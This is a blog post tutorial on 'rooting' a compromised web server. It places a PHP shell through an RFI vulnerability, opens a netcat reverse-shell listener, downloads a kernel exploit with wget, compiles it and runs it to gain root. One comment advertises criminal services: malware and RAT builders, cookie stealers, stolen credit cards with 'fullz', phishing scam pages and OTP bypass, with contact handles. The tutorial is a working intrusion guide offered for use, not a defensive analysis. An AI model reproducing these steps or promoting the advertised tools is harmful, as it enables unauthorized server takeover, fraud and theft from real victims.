Pages

Saturday, October 20, 2012

Rooting Tutorial


What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains

First of all, we need to get a shell on a site.
For this tutorial i will be using MulCi Shell.

So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.

Now, go to the 'Back Connect' tab and insert the following settings:
1- Your IP Address.
2-The port you forwarded.

Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.

C:\KroKite>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...

Now, when you have netcat listening to the port you forwarded, click 'Connect'.

When your connected, type 'whoami'.You shouldnt have root.

Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.

It should look something like this:
Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 0805 EDT 2008 i686
Now, we go on exploit-db.com and we will look for '2.6.17'.
Code:
hhttp://www.exploit-db.com/exploits/5092/

Now, we type 'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.
Code:
wget http://xpl_url.com

So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type 'gcc 5092 -o exploit'.
Code:
gcc 5092 -o exploit

5092- After the url path.http://www.site.com/5092.
exploit- Output name.


Now you can execute your exploit by typing './exploit'

Wait for the exploit to finish running and type root again.

It should output in something like this:
Code:
uid=0(root) gid=0(root) groups=500(apache)

This means you have successfully rooted the box .

credit to KroKite 

1 comment:

  1. Hello world
    I teach hacking andriod apk virus - windows Hacking - web server hacking -
    Reseller :- Hacking Tools & Hacking services, Also Teach Hacking Methods Via teem weaver or Anydesk,
    Each Method Take minimum 1 hour to learn with vedio Tutorial And Hacking Tools ,

    How to Make Money hacking tools,

    - Spamming & Tools ,
    - Carding & Tools ,
    - Virus with control panal and Spy bot files,
    - Virus With Builder And Crypter ,
    - Scanners with Bruters ,
    - Crypters with Doc Exploits ,pdf Exploits ,TExtfile Exploits ,
    - PHP Exploits with shell and mailer
    - OTP verications Bypass with Bulletproof Scam-page and Otp control
    - Company Ceo or cfo leads Any country
    - Rat virus with builder
    - Cookies Stealers and Builder
    - keyloger and builder
    - Credit card Scam-pages
    - Bank login Scam-pages
    - debit card topup scam page
    - donation scam-page
    - dhl login and tracking scam-page
    - fedax login and tracking scam-page
    - Shipping Tools

    Place & Ground
    learners you will pay cheap $ for demo Tools & Method

    Business grounds

    Credit card Low Interest Services,

    - Credit card with Fullz Information - Minimum Investment 150$ - With 50k Credit limit And balance
    - Debit Card Topup AS per Card limit - Minimum Investment 200$ - With 8000$ balance
    - Dating scam Fresh male female Logins - Minimum Investment 80$ - Dating Login upto 30

    -----------------
    ABOUT US :
    Icq :-675452902
    Skype: rushr00t000
    email me:- hackitbackd00r@gmail.com

    ReplyDelete